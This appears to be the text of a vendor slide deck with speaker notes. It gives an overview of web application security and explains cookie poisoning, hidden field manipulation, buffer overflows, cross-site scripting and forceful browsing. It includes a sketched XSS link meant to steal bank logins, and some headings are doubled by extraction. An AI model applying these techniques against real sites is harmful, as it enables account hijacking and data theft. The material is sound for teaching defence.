The document provides an overview of web application security. It discusses what web application security entails, which is achieving an acceptable level of security for a web application solution. It explains why web application security is important given increased reliance on web apps and their global accessibility. It outlines some common security risks like browser hijacking, cookie theft, and denial of service attacks. It also discusses how security problems should be addressed earlier in the development lifecycle to reduce costs. The document then delves into specific vulnerabilities like hidden field manipulation, cookie poisoning, buffer overflows, and cross-site scripting attacks. Examples are provided to illustrate how attackers can exploit these vulnerabilities.
2. What is Web Application Security?
Web Applications exist in many forms. Some
search, some count, others even transfer money
within your bank accounts. Web Applications are
employed to carry out many mission-critical
tasks and if anything is certain, our reliance
upon web applications will continue to grow.
So Simply Put,
Web Application Security is the
achievement of an acceptable level of
security assurance of a web application
solution.
Security Assurance = CIA
3. Why is web application security important?
Before software functionality was capable of being delivered via
the web, software developer’s security concerns were relative to
network and OS level threats given their user-base was limited to
internal or wan networks. All this has now changed. Web
developers now create software that runs upon web servers
accessed by anyone, anywhere. The scope and magnitude of their
software delivery has increased exponentially and in so doing,
security issues have also risen that are now web-centric and totally
bypass the legacy network and OS based defensive strategy.
- Browser Hi-Jacking
- Cookie Theft
- Server & Client Compromise
- Denial of Service
- Abuse
- User Privacy Invasion
4. Pay Me Now Or Pay Me Later
Security problems are found in the Design, Build and
Deployment/Maintenance phases of the application lifecycle. A
problem identified in any phase after the initial build may cause the
code to go back to the design stage to be addressed, and then to
pass through the necessary development phases again. This
obviously adds time, cost and resource conflicts to the entire
development process. It is well known that fixing a problem found in
the Testing phase is about 2-5 times more expensive than fixing it in
the coding phase, and fixing a problem found in the Maintenance
(deployment and beyond) phase is 5-7times more expensive than
fixing it in the coding phase
5. What Is The Ultimate Cost For Not Addressing
Security Early?
6. The Fourth Level of Web Security
Security
Behavior
Antivirus
Disruption
Desktop
1
Encryption
Interception
Transport
2
Manual Patching
Web Perversion
Web
Applications
4
Firewall
Illegal Access
3
Network
7. Desktop Transport Network Web Applications
Antivirus
Protection
Encryption
(SSL)
Firewalls/
Advanced Routers
Manual Patching
and Code Review
Digital Security Landscape
8. The business logic that
enables:
User’s interaction with Web site
Transacting/interfacing with back-
end data systems (databases, CRM,
ERP etc)
In the form of:
3rd party packaged software; i.e.
web server, shopping cart sw,
personalization engines etc.
Code developed in-house / web
builder / system integrator
Input and Output flow through each layer of the application
A break in any layer breaks the whole application
Web Server
User Interface Code
Front end Application
Backend Application
Database
Data
User Input
HTML/HTTP
Browser
What is a Web Application
10. Through a browser, a hacker can use even the smallest bug or
backdoor to change, or distort, the intent of the application.
Application Attack Objective
Form field: collect data Buffer overflow Crash servers/close business
Online shopping Hidden fields eShoplifting
Sloppy code Debug options Download proprietary database
Text Field: collect data Cross Site scripting eHijacking - Get account info
Customer account Cookie poisoning Identity theft
Web Manipulation Examples
11. The results of over 300 AppAudits
conducted with AppScan
97% of Sites Are Vulnerable
7%
7%
7%
4%
25%
12. The Web’s 7 Deadly Sins
Hidden Field ManipulationHidden Field Manipulation
Cookie PoisoningCookie Poisoning
Application Buffer OverflowApplication Buffer Overflow
Third-Party MisconfigurationThird-Party Misconfiguration
Cross-Site Server ScriptingCross-Site Server Scripting
Parameter TamperingParameter Tampering
SQL InjectionSQL Injection
13. Hidden Field Manipulation
Vulnerability explanationVulnerability explanation:
The application sends data to the client using a hidden field in a form. Modifying the hidden
field damages the data returning to the web application
Why Hidden Field ManipulationWhy Hidden Field Manipulation:
Passing hidden fields is a simple and efficient way to pass information from one part of the
application to another (or between two applications) without the use of complex backend
systems.
As a result of this manipulationAs a result of this manipulation :
The application acts according to the changed information and not according to the original
data
18. Cookie Poisoning
Vulnerability explanationVulnerability explanation:
The session information contained within the cookie is changed to a different value
causing the application to shift to the new session ID.
Why Cookie PoisoningWhy Cookie Poisoning:
Some session IDs are not-secure e.g. not encrypted or weakly encrypted or hashed.
This is generally due to lack of cryptographic expertise of the part of developers.
As a result of this manipulationAs a result of this manipulation :
Hackers can assume the user’s identity and have access to that user’s information –
identity theft/impersonation
23. Backdoor & Debug options
Vulnerability explanationVulnerability explanation:
The application has hidden debug options that can be activated by sending a
specific parameter or sequence
Why Backdoor and Debug optionsWhy Backdoor and Debug options:
1. Leaving debug options in the code enables developers to find and fix bugs
faster
2. Developers leave backdoors as a way of guaranteeing their access to the system
As a result of this manipulationAs a result of this manipulation :
Activation of the hidden debug option allows the hacker to have extreme access to
the application (usually unlimited).
27. Application Buffer Overflow
Vulnerability explanationVulnerability explanation:
Exploiting a flaw in a form to overload the server with excess information - sending
more characters will cause it to misbehave
Why Application Buffer OverflowWhy Application Buffer Overflow:
The application does not check the number of characters
As a result of this manipulationAs a result of this manipulation :
The application crashes and in many cases causes the whole site to shut down (DoS).
In other cases, the application executes the code received as the input
33. Stealth Commanding
Vulnerability explanationVulnerability explanation:
Concealing dangerous commands via a Trojan horse with the intent to run malicious
or unauthorized code that is damaging to the site.
Why Stealth CommandingWhy Stealth Commanding:
Applications tend to use the content received from a field to evaluate a new
command. However, they assume that the content is only data and not executable
code.
As a result of this manipulationAs a result of this manipulation :
The hacker can perform any command on the web-server, including complete shut
down, defacement, or access to all information
36. Known Vulnerabilities
Vulnerability explanationVulnerability explanation::
Some technology used in sites have inherent weaknesses that a persistent hacker, or
a hacker with automated scanning tools, can exploit easily. Users are dependent
on patches from the developer. After discovered in one site they can be used in
all the sites using the same component
Why Known VulnerabilitiesWhy Known Vulnerabilities:
Third party vendors have bugs (Microsoft IIS etc). Since their products appear in
many sites they are examined thoroughly by a large number of hackers
As a result of this manipulationAs a result of this manipulation:
Once a bug is found, large parts of the internet are scanned and exploited. The
actual result varies according to the vulnerability type, but ability to gain the
administrators’ passwords and take control of the site is not unusual!
38. 3rd
Party Misconfigurations
Vulnerability explanationVulnerability explanation:
A misconfiquration, or human error during install of 3rd
party software can cause
default passwords or settings unchanged – open invitation for attack
Why 3Why 3rdrd
party misconfiqurationsparty misconfiqurations:
Occurs during the installation and maintenance of the 3rd
party application
As a result of this manipulationAs a result of this manipulation :
Through a configuration error a hacker could create a new database that renders
the existing one unusable by the site
40. Cross Site Scripting
Vulnerability explanationVulnerability explanation:
A third party creates a link (or sends an email) and the URL contains a parameter
with a script – once the user connects, the site runs this script
Why Cross Site ScriptingWhy Cross Site Scripting:
Many parameters are implanted within the HTML of following responses, while
not checking their content for scripts.
As a result of this manipulationAs a result of this manipulation:
“Virtual hijacking” of the session. Any information flowing between the legitimate
user and site can be manipulated or transmitted to the evil 3rd
party.
41. Press this link to get to your bank
Underlying link: http://www.mybank.com?a=<evil javascript>
The JavaScript program collects and sends user names and
passwords
Enter your login information
1
2
Username
Password
3
Cross Site Scripting - Example
42. Parameter Tampering
Vulnerability explanationVulnerability explanation:
Parameters are used to obtain information from the client. This information can be
changed in a site’s URL parameter
Why Parameter TamperingWhy Parameter Tampering:
Developers focus on the legal values of parameters and how they should be
utilized. Little if any attention is given to the incorrect values
As a result of this manipulationAs a result of this manipulation :
The application can perform a function that was not intended by its developer like
giving access to customer information
45. Forceful Browsing
Vulnerability explanationVulnerability explanation:
By “guessing” the names of files and directories the hacker can view them without
going through the business logic leading to those objects
Why forceful browsingWhy forceful browsing:
1. Default files are left during the installation process
2. New files that should not be exposed and old files which should be removed are
left (outside the normal flow) by mistake
As a result of this manipulationAs a result of this manipulation :
Content (log files, administration facilities, application source code) is revealed due
to file and directory access
The point of these animated slides is to show that the applications are written to work with the security tools and policies. If you compromise the application (via a browser) you can bypass the security.
Base - explosion of WEB in ‘93 allowed anyone with a browser to access your site.
1nd anime - firewalls were put in place to only allow specific port access (i.e. WEB traffic)
2rd anime - with FW still have access problem so add authentication to only allow WEB access with channel encryption
3th anime - need for e-Business has introduced backend application driven by the WEB browsers. Compromise the application via the browser and you get past the security policies, compromise the applications, and access/manipulate sensitive resource.
4th anime - The same issue still exists. If we have done our job properly then we may have taken care of all of the know attacks, but we still have not add addressed the unknown application hack. These are real threats to the site. Click on the “APPLICATION HACKS” to link to the application hacks demo. The demo will return back to the point when completed (can always hit escape out of the demo ppt to return here).
5th anime - AppShield solves this problem by providing application perimeter defense, front ending any potential threat so that they never reach the server. A point to make here is that the server will not spend its time processing illegal requests.
If we look at the complexity of the web application, it is multi-layered and includes all the business logic that enables user’s interaction with the web site and the transacting with the back-end data systems sitting behind the site. These applications come in the form of 3rd party packaged software and code developed in-house.
Even in a secure environment, so much has to go right for these layers to behave appropriately that it is amazing these sites work half the time!. (NEXT SLIDE)
Also could be an example of 3rd party missconfiguration
Also could be an example of 3rd party missconfiguration
Also could be an example of 3rd party missconfiguration
Also could be an example of 3rd party missconfiguration
Also could be an example of 3rd party missconfiguration
Also could be an example of 3rd party missconfiguration